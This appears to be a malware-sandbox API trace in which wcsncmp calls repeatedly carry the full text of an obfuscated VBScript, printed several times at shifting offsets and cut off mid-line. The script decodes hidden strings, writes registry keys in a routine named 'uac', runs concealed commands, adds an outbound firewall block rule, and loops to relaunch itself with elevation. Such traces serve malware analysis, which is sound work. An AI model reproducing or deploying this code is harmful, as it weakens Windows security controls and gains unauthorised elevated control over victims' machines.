bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.291] wcsncmp (_String1="im sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.291] wcsncmp (_String1="m sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.291] wcsncmp (_String1=" sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.291] wcsncmp (_String1="sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 